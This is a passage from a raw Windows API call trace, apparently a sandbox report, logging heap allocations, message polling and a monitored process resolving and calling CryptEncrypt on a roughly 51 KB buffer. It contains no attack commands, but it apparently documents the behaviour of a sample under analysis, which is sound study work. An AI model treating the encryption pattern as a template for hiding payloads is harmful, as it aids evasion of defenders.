(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0221.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2e80330 [0221.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0221.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0e78 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0221.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0221.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0221.797] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0221.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0221.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0221.797] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xca26, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xca28) returned 1 [0221.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0221.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.797] CharLowerBuffW (in: lpsz="byte[51752]", cchLength=0xb | out: lpsz="byte[51752]") returned 0xb [0221.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.801] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0221.801] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0221.801] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0221.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0221.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0221.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2e8cd60 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8cd60 | out: hHeap=0x970000) returned 1 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x3be0e78 [0221.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0221.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0221.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.808] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0221.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0221.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0221.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0221.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0221.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51388 [0221.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0221.844] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xca26, dwBufLen=0xca28 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xca28) returned 1 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0221.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0221.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55238 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0221.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0221.847] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0221.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0221.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0221.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0221.849] RtlAllocateHeap 